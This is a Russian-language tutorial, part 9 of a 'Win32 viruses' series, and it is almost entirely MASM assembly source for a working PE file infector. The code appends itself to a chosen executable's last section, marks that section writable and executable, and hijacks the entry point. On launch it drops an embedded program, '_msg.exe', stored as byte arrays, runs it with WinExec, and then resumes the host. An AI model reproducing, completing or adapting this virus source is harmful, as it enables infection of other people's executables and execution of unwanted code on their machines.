TPOC Lab -> Статьи -> Win32-вирусы. Часть 9.

"Win32-вирусы"
9. Способность «породить» нечто полезное

Теперь научим же нашу программу порождать самостоятельный exe - файл и запускать его же.
Начнем …

.386
.MODEL flat,stdcall
OPTION CASEMAP : NONE

include \masm32\include\windows.inc

include \masm32\include\user32.inc

include \masm32\include\kernel32.inc

include \masm32\include\comdlg32.inc

include \masm32\include\masm32.inc

includelib \masm32\lib\user32.lib

includelib \masm32\lib\kernel32.lib

includelib \masm32\lib\comdlg32.lib

includelib \masm32\lib\masm32.lib

MIN_KERNEL_SEARCH_BASE EQU 070000000h

MAX_API_STRING_LENGTH EQU 150

VIRII_SIZE EQU ( OFFSET IGI_END - OFFSET IGI_START)

ALIGN_CORRECTION EQU 000001000h

IGI_TRADEMARK EQU ('IGI')

VIRII_R_SIZE EQU 000002000h ; !!!! УВЕЛИЧИЛ ДЛИНУ КОДА УВЕЛИЧЬ ЭТУ ВЕЛИЧИНУ !!!!!

VIRII_V_SIZE EQU 000002000h

MAX EQU 255

.CONST

szError DB "Ошибка",0

szGetBaseErr DB "Ошибка в получении адреса kernel.dll",0

szCap DB ":) ",0

szCap_0 DB "CALL CreateFile is FAILED",0

szCap_1 DB "CALL GetFileSize is FAILED",0

szCap_2 DB "CALL GlobalAlloc is FAILED",0

szCap_3 DB "CALL ReadFile is FAILED",0

.DATA

filter db 'PE-executables (*.exe)',0,'*.exe',0,0

buffer db 255 dup (0)

about db 'Please Pick the Target File',0

about_f db 'Target File is ...',0

hFile DD 0

dwFsize DD 0

pMem DD 0

OpenStruct dd 76,0

dd 0

dd offset filter, 0,0,0, offset buffer, MAX, 0,0,0, offset about

dd OFN_FILEMUSTEXIST or OFN_HIDEREADONLY or OFN_EXPLORER

dd 0, 0, 0, 0, 0

cBuff DB 120 DUP (0)

VarBuff DB 0

.CODE

Main:

invoke GetOpenFileNameA, offset OpenStruct

.if eax==0

jmp _exit_

.endif

lea eax,offset buffer

push MB_ICONINFORMATION OR MB_SYSTEMMODAL

push OFFSET szCap

push EAX

push NULL

CALL MessageBox

invoke CreateFile,offset buffer,\

GENERIC_WRITE or GENERIC_READ ,\;

FILE_SHARE_READ or FILE_SHARE_WRITE,\;

NULL,\

OPEN_EXISTING,\

FILE_ATTRIBUTE_NORMAL,\

NULL

.IF EAX == INVALID_HANDLE_VALUE

XOR EAX, EAX

INC EAX

push MB_ICONINFORMATION OR MB_SYSTEMMODAL

push OFFSET szCap

push OFFSET szCap_0

push NULL

CALL MessageBox

JMP SkipFileInfection

.ENDIF

MOV hFile, EAX

PUSH 0

PUSH EAX

CALL GetFileSize

OR EAX, EAX

.IF ZERO?

push MB_ICONINFORMATION OR MB_SYSTEMMODAL

push OFFSET szCap

push OFFSET szCap_1

push NULL

CALL MessageBox

ADD EAX, 2

JMP SkipFileAndClean1

.ENDIF

MOV dwFsize, EAX

ADD EAX, ALIGN_CORRECTION + VIRII_SIZE

PUSH EAX

PUSH GMEM_FIXED OR GMEM_ZEROINIT

CALL GlobalAlloc

OR EAX, EAX

.IF ZERO?

push MB_ICONINFORMATION OR MB_SYSTEMMODAL

push OFFSET szCap

push OFFSET szCap_2

push NULL

CALL MessageBox

ADD EAX, 3

JMP SkipFileAndClean1

.ENDIF

MOV pMem, EAX

LEA EAX, OFFSET VarBuff

PUSH NULL

PUSH EAX

PUSH dwFsize

PUSH pMem

PUSH hFile

CALL ReadFile

.IF EAX==0

push MB_ICONINFORMATION OR MB_SYSTEMMODAL

push OFFSET szCap

push OFFSET szCap_3

push NULL

CALL MessageBox

CALL GetLastError

push OFFSET cBuff

push eax

CALL dwtoa

push MB_ICONINFORMATION OR MB_SYSTEMMODAL

push OFFSET szCap

push OFFSET cBuff

push NULL

CALL MessageBox

.ENDIF

;---- Поищем PE сигнатуру ----

MOV ESI, pMem

CMP WORD PTR [ESI], IMAGE_DOS_SIGNATURE

.IF !ZERO?

JMP SkipFileAndClean2

.ENDIF

ADD WORD PTR SI, [ESI+03Ch]

CMP DWORD PTR [ESI], IMAGE_NT_SIGNATURE

.IF !ZERO?

JMP SkipFileAndClean2

.ENDIF

ASSUME ESI : PTR IMAGE_NT_HEADERS

;----Найдем последнюю секцию----

MOV EDI, ESI

ADD EDI, 0F8h

MOV CX, [ESI].FileHeader.NumberOfSections

.WHILE CX != 1

DEC CX

ADD EDI, SIZEOF IMAGE_SECTION_HEADER

.ENDW

ASSUME EDI : PTR IMAGE_SECTION_HEADER

; WATCOM C/C++ компилчторы устанавливают Misc.VirtualSize в 0, исправим это

.IF [EDI].Misc.VirtualSize == 0

MOV EAX, [ESI].OptionalHeader.SizeOfImage

SUB EAX, [EDI].VirtualAddress

MOV [EDI].Misc.VirtualSize, EAX

.ENDIF

;----Копируем вирусній код в файл----

MOV EAX, [EDI].PointerToRawData

ADD EAX, [EDI].SizeOfRawData

ADD EAX, pMem

PUSH ESI

PUSH EDI

MOV ECX, VIRII_SIZE

MOV ESI, OFFSET IGI_START

XCHG EAX, EDI

REP MOVSB

POP EDI

POP ESI

;----Изменим NT -заголовок ----

;-> Изменим OptionalHeader.FileAlignment

MOV [ESI].OptionalHeader.FileAlignment, 0200h

;->Увеличим ImageBase

ADD [ESI].OptionalHeader.SizeOfImage, VIRII_V_SIZE

;-> Точка входа (EntryPoint)

; сохраним оригинальную EP

MOV EAX, [EDI].SizeOfRawData

ADD EAX, [EDI].PointerToRawData

ADD EAX, pMem

ADD EAX, (OFFSET Loader_Constants - OFFSET IGI_START)

MOV EBX, [ESI].OptionalHeader.AddressOfEntryPoint

ADD EBX, [ESI].OptionalHeader.ImageBase

;Сохраним -> mov dwOEPVA,ebx

PUSH EBX

POP [EAX]

; Изменим EP

MOV EAX, [EDI].VirtualAddress

ADD EAX, [EDI].SizeOfRawData

MOV [ESI].OptionalHeader.AddressOfEntryPoint, EAX

;->Установим "Товарный знак"

MOV [ESI].FileHeader.PointerToSymbolTable, IGI_TRADEMARK

;----Изменим информацию о секции----

ADD [EDI].Misc.VirtualSize, VIRII_V_SIZE

ADD [EDI].SizeOfRawData, VIRII_R_SIZE

OR [EDI].Characteristics, 0E0000000h ; Секцию можно: читать, писать, выполнять

;---- Пишем из памяти на диск----

;установим файловый указатель записи в 0

PUSH FILE_BEGIN

PUSH NULL

PUSH 0

PUSH hFile

CALL SetFilePointer

; Найдем новый размер файла-жертвы

MOV ECX, [EDI].PointerToRawData

ADD ECX, [EDI].SizeOfRawData

; Пишем на диск

PUSH NULL

LEA EAX, OFFSET VarBuff

PUSH EAX

PUSH ECX

PUSH pMem

PUSH hFile

CALL WriteFile

ASSUME EDI : NOTHING

ASSUME ESI : NOTHING

XOR EAX, EAX

SkipFileAndClean2:

; Освободим выделенную память

PUSH EAX

PUSH pMem

CALL GlobalFree

POP EAX

SkipFileAndClean1:

; Освободим уазатели

PUSH EAX

PUSH hFile

CALL CloseHandle

POP EAX

SkipFileInfection:

invoke ExitProcess,0

IGI_START:

pushad

call delta

delta:

pop ebp

sub ebp, offset delta

push dword ptr [esp+20h]

call GetKernelBase

or EAX, EAX

jz OEPJump

mov [ebp+dwKernelBase], EAX

lea eax, [ebp+OFFSET szWinExec]

PUSH eax

PUSH [ebp+dwKernelBase]

CALL GetProcAddr

MOV [ebp+_WinExec], EAX

lea eax, [ebp+OFFSET szCloseHandle]

PUSH eax

PUSH [ebp+dwKernelBase]

CALL GetProcAddr

MOV [ebp+_CloseHandle], EAX

lea eax, [ebp+OFFSET szWriteFile]

PUSH eax

PUSH [ebp+dwKernelBase]

CALL GetProcAddr

MOV [ebp+_WriteFile], EAX

;---------------------------------------------------

lea eax, [ebp+OFFSET szDeleteFileA]

PUSH eax

PUSH [ebp+dwKernelBase]

CALL GetProcAddr

MOV [ebp+_DeleteFileA], EAX

;---------------------------------------------------

lea eax, [ebp+OFFSET szCreateFileA]

PUSH eax

PUSH [ebp+dwKernelBase]

CALL GetProcAddr

MOV [ebp+_CreateFileA], EAX

;…………………………………………………………………………………………………………………………………………………………

;invoke CreateFile,offset buffer,\

; GENERIC_WRITE or GENERIC_READ ,\;

; FILE_SHARE_READ or FILE_SHARE_WRITE,\;

; NULL,\

; OPEN_EXISTING,\

; FILE_ATTRIBUTE_NORMAL,\

; NULL

push NULL

push FILE_ATTRIBUTE_ARCHIVE

push OPEN_ALWAYS

push NULL

push FILE_SHARE_READ or FILE_SHARE_WRITE

push GENERIC_WRITE

lea eax, [ebp+OFFSET szNameEXE]

push eax

CALL [ebp+_CreateFileA]

mov [ebp+hfileEXE],EAX

;…………………………………………………………………………………………………………………………………………………………

;invoke lstrlen, addr TextBuf

;invoke WriteFile,pFile_log,ADDR TextBuf,eax,ADDR SizeReadWrite,NULL

push 0

lea eax, [ebp+OFFSET Vbuff]

push eax

mov eax, 2560

push eax

lea eax, [ebp+OFFSET _fileDAT_1]

push eax

mov EAX,[ebp+hfileEXE]

push eax

CALL [ebp+_WriteFile]

push [ebp+hfileEXE]

CALL [ebp+_CloseHandle]

push 0

lea eax, [ebp+OFFSET szNameEXE]

push eax

CALL [ebp+_WinExec]

;**************************************************************************

OEPJump:

MOV EAX, [EBP+dwOEPVA]

.IF EAX

MOV [ESP+01Ch], EAX

POPAD

JMP EAX

.ELSE

POPAD

RET

.ENDIF

GetKernelBase PROC USES EDI ESI, dwTopStack : DWORD

MOV EDI, dwTopStack

AND EDI, 0FFFF0000h

.WHILE TRUE

.IF WORD PTR [EDI] == IMAGE_DOS_SIGNATURE

MOV ESI, EDI

ADD ESI, [ESI+03Ch]

.IF DWORD PTR [ESI] == IMAGE_NT_SIGNATURE

.BREAK

.ENDIF

.ENDIF

ExceptCont:

SUB EDI, 010000h

.IF EDI < MIN_KERNEL_SEARCH_BASE

MOV EDI, 0BFF70000h

.BREAK

.ENDIF

.ENDW

XCHG EAX, EDI

RET

GetKernelBase ENDP

GetProcAddr PROC USES ESI EDI ECX EBX EDX, dwDllBase : DWORD, szApi : LPSTR

MOV ESI, dwDllBase

CMP WORD PTR [ESI], IMAGE_DOS_SIGNATURE

JNZ @@BadExit

ADD ESI, [ESI+03Ch]

CMP DWORD PTR [ESI], IMAGE_NT_SIGNATURE

JNZ @@BadExit

MOV EDI, szApi

MOV ECX, MAX_API_STRING_LENGTH

XOR AL, AL

REPNZ SCASB

MOV ECX, EDI

SUB ECX, szApi

MOV EDX, [ESI+078h]

ADD EDX, dwDllBase

ASSUME EDX : PTR IMAGE_EXPORT_DIRECTORY

MOV EBX, [EDX].AddressOfNames

ADD EBX, dwDllBase

XOR EAX, EAX

.REPEAT

MOV EDI, [EBX]

ADD EDI, dwDllBase

MOV ESI, szApi

PUSH ECX

REPZ CMPSB

.IF ZERO?

.BREAK

.ENDIF

POP ECX

ADD EBX, 4

INC EAX

.UNTIL EAX == [EDX].NumberOfNames

MOV ESI, [EDX].AddressOfNameOrdinals

ADD ESI, dwDllBase

PUSH EDX

MOV EBX, 2

XOR EDX, EDX

MUL EBX

ADD EAX, ESI

XOR ECX, ECX

MOV WORD PTR CX, [EAX]

POP EDX

MOV EDI, [EDX].AddressOfFunctions

XOR EDX, EDX

MOV EBX, 4

MOV EAX, ECX

MUL EBX

ADD EAX, dwDllBase

ADD EAX, EDI

MOV EAX, [EAX]

ADD EAX, dwDllBase

JMP @@ExitProc

ASSUME EDX : NOTHING

@@BadExit:

XOR EAX, EAX

@@ExitProc:

RET

GetProcAddr ENDP

Loader_Constants:

dwOEPVA dd 0

szLoadLibrary db "LoadLibraryA",0

szGetProcAddress db "GetProcAddress",0

szCreateFileA db "CreateFileA",0

szDeleteFileA db "DeleteFileA",0

szWriteFile db "WriteFile",0

szCloseHandle db "CloseHandle",0

szWinExec db "WinExec",0

;szUser32 db "user32",0

;szMessageBox db "MessageBoxA",0

;szInfoCap db "Добрый день, уважаемый! ",0

;szNameBAT db "1.bat",0

szNameEXE db "_msg.exe",0

hfileEXE dd 0

_CreateFileA dd 0

_DeleteFileA dd 0

_WriteFile dd 0

_CloseHandle dd 0

_WinExec dd 0

_LoadLibrary dd 0

_GetProcAddress dd 0

;_MessageBox dd 0

dwKernelBase dd 0

dwUserBase dd 0

_fileDAT_1 db 77, 90, 144, 0, 3, 0, 0, 0, 4, 0, 0, 0, 255, 255, 0, 0, 184, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0

_fileDAT_2 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 176, 0, 0, 0

_fileDAT_3 db 14, 31, 186, 14, 0, 180, 9, 205, 33, 184, 1, 76, 205, 33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111

_fileDAT_4 db 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46, 13, 13, 10, 36, 0, 0, 0, 0, 0, 0, 0

_fileDAT_5 db 93, 101, 253, 200, 25, 4, 147, 155, 25, 4, 147, 155, 25, 4, 147, 155, 151, 27, 128, 155, 17, 4, 147, 155, 229, 36, 129, 155, 24, 4, 147, 155

_fileDAT_6 db 82, 105, 99, 104, 25, 4, 147, 155, 0, 0, 0, 0, 0, 0, 0, 0, 80, 69, 0, 0, 76, 1, 3, 0, 34, 94, 113, 64, 0, 0, 0, 0

_fileDAT_7 db 0, 0, 0, 0, 224, 0, 15, 1, 11, 1, 5, 12, 0, 2, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 16, 0, 0

_fileDAT_8 db 0, 32, 0, 0, 0, 0, 64, 0, 0, 16, 0, 0, 0, 2, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0

_fileDAT_9 db 0, 64, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 16, 0, 0, 16, 0, 0, 0, 0, 16, 0, 0, 16, 0, 0

_fileDAT_10 db 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 32, 0, 0, 60, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_11 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_12 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_13 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_14 db 0, 0, 0, 0, 0, 0, 0, 0, 46, 116, 101, 120, 116, 0, 0, 0, 42, 0, 0, 0, 0, 16, 0, 0, 0, 2, 0, 0, 0, 4, 0, 0

_fileDAT_15 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 224, 46, 114, 100, 97, 116, 97, 0, 0, 146, 0, 0, 0, 0, 32, 0, 0

_fileDAT_16 db 0, 2, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 64, 46, 100, 97, 116, 97, 0, 0, 0

_fileDAT_17 db 33, 0, 0, 0, 0, 48, 0, 0, 0, 2, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 192

;18

_fileDAT_18 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_19 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_20 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_21 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_22 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_23 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_24 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_25 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_26 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_27 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_28 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_29 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_30 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_31 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_32 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

;32

_fileDAT_33 db 104, 64, 16, 0, 0, 104, 0, 48, 64, 0, 104, 4, 48, 64, 0, 106, 0, 232, 8, 0, 0, 0, 106, 0, 232, 7, 0, 0, 0, 204, 255, 37

_fileDAT_34 db 8, 32, 64, 0, 255, 37, 0, 32, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

;35

_fileDAT_35 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_36 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_37 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_38 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_39 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_40 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_41 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_42 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_43 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_44 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_45 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_46 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_47 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_48 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

;48

_fileDAT_49 db 118, 32, 0, 0, 0, 0, 0, 0, 92, 32, 0, 0, 0, 0, 0, 0, 84, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 106, 32, 0, 0

_fileDAT_50 db 8, 32, 0, 0, 76, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 132, 32, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_51 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 118, 32, 0, 0, 0, 0, 0, 0, 92, 32, 0, 0, 0, 0, 0, 0, 157, 1, 77, 101

_fileDAT_52 db 115, 115, 97, 103, 101, 66, 111, 120, 65, 0, 117, 115, 101, 114, 51, 50, 46, 100, 108, 108, 0, 0, 128, 0, 69, 120, 105, 116, 80, 114, 111, 99

_fileDAT_53 db 101, 115, 115, 0, 107, 101, 114, 110, 101, 108, 51, 50, 46, 100, 108, 108, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

;54

_fileDAT_54 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_55 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_56 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_57 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_58 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_59 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_60 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_61 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_62 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_63 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_64 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

;64

_fileDAT_65 db 58, 41, 32, 0, 46, 46, 46, 32, 224, 32, 242, 229, 239, 229, 240, 252, 32, 223, 32, 45, 32, 95, 77, 83, 71, 46, 101, 120, 101, 32, 33, 32

;66
_fileDAT_66 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_67 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_68 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_69 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_70 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_71 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_72 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_73 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_74 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_75 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_76 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_77 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_78 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_79 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_80 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

;80
Vbuff dw 0

_exit_:
;.........................................................................................................................
IGI_END:

end Main

VIRII_R_SIZE EQU 000002000h ; !!! УВЕЛИЧИЛ ДЛИНУ КОДА УВЕЛИЧЬ ЭТУ ВЕЛИЧИНУ
;VIRII_R_SIZE EQU 000000600h
;VIRII_R_SIZE EQU 000000200h

Снова увеличим величину VIRII_R_SIZE, мотивы в статье 8.

2)

_fileDAT_0 db …

Тут нужно разобраться с программой [1.2]. Кстати скачать ее не помешает, она с исходником, вся идея на лицо, как говорится … Программа, что не может не удивить , распознается антивирусными программами как некий FT0DAT.Genegator, что это за подвид я не знаю : )

В этом случае программа [1.1] генерирует следующий код:

f_to_dc.txt

